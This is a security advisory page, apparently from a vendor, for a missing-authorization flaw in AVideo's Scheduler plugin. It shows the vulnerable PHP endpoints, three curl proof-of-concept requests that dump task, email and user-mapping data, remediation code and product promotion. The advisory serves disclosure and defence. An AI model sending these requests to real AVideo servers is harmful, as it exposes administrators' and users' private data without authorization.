CVE-2026-33761

CVE-2026-33761 is a medium-severity missing authorization vulnerability in wwbn/avideo (composer), affecting versions <= 26.0. No fixed version is listed yet.

Summary

Three list.json.php endpoints in the Scheduler plugin lack any authentication check, while every other endpoint in the same plugin directories (add.json.php, delete.json.php, index.php) requires User::isAdmin(). An unauthenticated attacker can retrieve all scheduled tasks (including internal callback URLs and parameters), admin-composed email messages, and user-to-email targeting mappings by sending simple GET requests.

Details

The vulnerable files are:

1. plugin/Scheduler/View/Scheduler_commands/list.json.php:1-7

<?php
require_once '../../../../videos/configuration.php';
require_once $global['systemRootPath'] . 'plugin/Scheduler/Objects/Scheduler_commands.php';
header('Content-Type: application/json');

$rows = Scheduler_commands::getAll();
?>
{"data": <?php echo json_encode($rows); ?>}

2. plugin/Scheduler/View/Emails_messages/list.json.php:1-10

<?php
require_once '../../../../videos/configuration.php';
require_once $global['systemRootPath'] . 'plugin/Scheduler/Objects/Emails_messages.php';
header('Content-Type: application/json');

$rows = Emails_messages::getAll();
$total = Emails_messages::getTotal();
?>
{"data": <?php echo json_encode($rows); ?>, ...}

3. plugin/Scheduler/View/Email_to_user/list.json.php:1-10

<?php
require_once '../../../../videos/configuration.php';
require_once $global['systemRootPath'] . 'plugin/Scheduler/Objects/Email_to_user.php';
header('Content-Type: application/json');

$rows = Email_to_user::getAll();
$total = Email_to_user::getTotal();
?>
{"data": <?php echo json_encode($rows); ?>, ...}

None of these files check authentication before calling getAll(), which executes SELECT * FROM {table} and returns the entire table contents.

In contrast, every sibling endpoint requires admin access. For example, plugin/Scheduler/View/Scheduler_commands/add.json.php:12-15:

if(!User::isAdmin()){
    $obj->msg = "You cant do this";
    die(json_encode($obj));
}

The Scheduler_commands table (defined in plugin/Scheduler/Objects/Scheduler_commands.php) stores fields including callbackURL (internal server URLs with query parameters), parameters (JSON blobs containing user IDs and email configuration), status, timezone, and cron scheduling fields. The Emails_messages table stores subject and message (full HTML email bodies composed by admins). The Email_to_user table maps users_id to emails_messages_id, revealing which users are targeted by which email campaigns.

PoC

# 1. Retrieve all scheduled tasks, exposes internal callbackURLs and parameters
curl -s 'https://target/plugin/Scheduler/View/Scheduler_commands/list.json.php' | jq '.data[] | {id, callbackURL, parameters, status, type}'

# 2. Retrieve all admin-composed email messages, exposes subject and HTML body
curl -s 'https://target/plugin/Scheduler/View/Emails_messages/list.json.php' | jq '.data[] | {id, subject, message}'

# 3. Retrieve user-to-email targeting mappings, reveals which users receive which emails
curl -s 'https://target/plugin/Scheduler/View/Email_to_user/list.json.php' | jq '.data[] | {users_id, emails_messages_id, sent_at}'

All three return full database contents with no authentication required. No session cookie or token is needed.

Impact

An unauthenticated attacker can:

  • Enumerate internal infrastructure: callbackURL fields expose internal server URLs and query parameters used by the scheduler, potentially revealing internal API endpoints and their parameter structures
  • Read admin email campaigns: Full email subjects and HTML message bodies composed by administrators are exposed
  • Map user targeting: The Email_to_user table reveals which users_id values are targeted by which email campaigns, enabling user enumeration and profiling
  • Gather reconnaissance: Scheduling configuration (cron fields, execution status, timezone) reveals operational patterns and timing of automated tasks

The information disclosed could be used to facilitate further attacks (e.g., using discovered internal URLs for SSRF, or user IDs for targeted account attacks).

The application does not perform an authorization check before performing a sensitive operation. Typical impact: unauthorized access to restricted functionality or data.

CVE-2026-33761 has a CVSS score of 5.3 (Medium). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. No fixed version is listed yet, so configuration controls and monitoring matter more in the interim.

Affected versions

wwbn/avideo (<= 26.0)

Security releases

Not available

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Add User::isAdmin() checks to all three list.json.php files, matching the pattern used by sibling endpoints. For each file, add the following after the require_once lines and before the data retrieval:

plugin/Scheduler/View/Scheduler_commands/list.json.php:

<?php
require_once '../../../../videos/configuration.php';
require_once $global['systemRootPath'] . 'plugin/Scheduler/Objects/Scheduler_commands.php';
header('Content-Type: application/json');

if(!User::isAdmin()){
    die(json_encode(['error' => true, 'msg' => 'Not authorized']));
}

$rows = Scheduler_commands::getAll();
?>
{"data": <?php echo json_encode($rows); ?>}

Apply the same pattern to Emails_messages/list.json.php and Email_to_user/list.json.php.

Frequently Asked Questions

  1. What is CVE-2026-33761? CVE-2026-33761 is a medium-severity missing authorization vulnerability in wwbn/avideo (composer), affecting versions <= 26.0. No fixed version is listed yet. The application does not perform an authorization check before performing a sensitive operation.
  2. How severe is CVE-2026-33761? CVE-2026-33761 has a CVSS score of 5.3 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of wwbn/avideo are affected by CVE-2026-33761? wwbn/avideo (composer) versions <= 26.0 is affected.
  4. Is there a fix for CVE-2026-33761? No fixed version is listed for CVE-2026-33761 yet. Monitor the advisory for updates and apply mitigations in the interim.
  5. Is CVE-2026-33761 exploitable, and should I be worried? Whether CVE-2026-33761 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-33761 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-33761? No fixed version is listed yet. In the interim: Keep the dependency up to date. Ensure authorization checks are enforced consistently on all sensitive operations.

Other vulnerabilities in wwbn/avideo

CVE-2026-55173CVE-2026-33731CVE-2026-33692CVE-2026-33684CVE-2026-54458

Stop the waste.
Protect your environment with Kodem.